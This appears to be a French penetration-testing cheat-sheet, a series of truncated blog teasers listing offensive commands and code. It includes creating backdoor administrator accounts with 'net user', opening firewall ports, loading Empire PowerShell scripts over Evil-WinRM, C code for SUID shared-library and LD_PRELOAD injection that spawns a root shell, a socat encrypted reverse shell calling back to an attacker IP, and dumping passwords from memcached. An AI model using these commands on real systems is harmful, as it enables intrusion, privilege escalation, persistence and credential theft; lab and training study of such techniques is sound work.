Options pour xfreerdp /dynamic-resolution — permet d’ajuster la taille de la fenêtre, ajustant la résolution de la cible. /size:WIDTHxHEIGHT — règle une taille spécifique dans le cas où la celle-ci n’est pas ajustée automatiquement avec l’option /dynamic-resolution +clipboard — active le support pour le clipboard /drive:LOCAL_DIRECTORY,SHARE_NAME — créer un dossier partagé. Pour partager le dossier … Continuer la lecture
net user USERNAME PASSWORD /add net localgroup Administrators USERNAME /add net localgroup "Remote Management Users" USERNAME /add
Sur la machine dont on veut déterminer l’accessibilité tcpdump -i tun0 icmp Sur le serveur compromis ping -n 3 ATTACKING_IP
firewall-cmd –zone=public –add-port PORT/tcp #CentOS netsh advfirewall firewall add rule name="NAME" dir=in action=allow protocol=tcp localport=PORT #windows
Il est possible de télécharger ou téléverser des fichiers à partir de Evil-WinRM avec les commandes upload et download Il est possible de rendre accessible des scripts powershell qui se situent sur la machine de l’attaquant evil-winrm -u USERNAME -p PASSWORD -i IP -s /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/ Invoke-Portscan.ps1 Get-Help Invoke-Portscan Invoke-Portscan -Hosts 10.9.0.70 -TopPorts 50 Il existe … Continuer la lecture
suid injection #include <stdio.h> #include <stdlib.h> toinject.c gcc -shared -fPIC -o /home/user/.config/libcalc.so toinject.c #par exemple, en utilisant strace, on se rend compte que le binaire essaie de charger /home/user/.config/libcalc.so toinject.c static void inject() __attribute__((constructor)); void inject() { setuid(0); system("/bin/bash -p"); }
On peut injecter du code lors de l’exécution d’une commande avec sudo en modifiant les variables d’environnement LD_PRELOAD ou LD_LIBRARY_PATH gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c On peut obtenir un root shell en exécutant un programme que l’on peut exécuter avec sudo de cette façon sudo LD_PRELOAD=/tmp/preload.so program-name-here preload.c #include <stdio.h> #include <sys/types.h> #include … Continuer la lecture
net user /add net localgroup administrators /add
export term=XTERM ctrl+Z stty raw -echo; fg reset stty -a #pour savoir le nombre de lignes et colonnes stty rows stty cols socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 TCP-L:53 FILE:`tty`,raw,echo=0 socat OPENSSL:53,verify=0 TCP:10.10.10.5:53 EXEC:”bash -li”,pty,stderr,sigint,setsid,sane #connect back to it
stats cachedump 1 0 On obtient les VALUE et en utilisant get avec le nom de la variable. Exemple: get user get passwd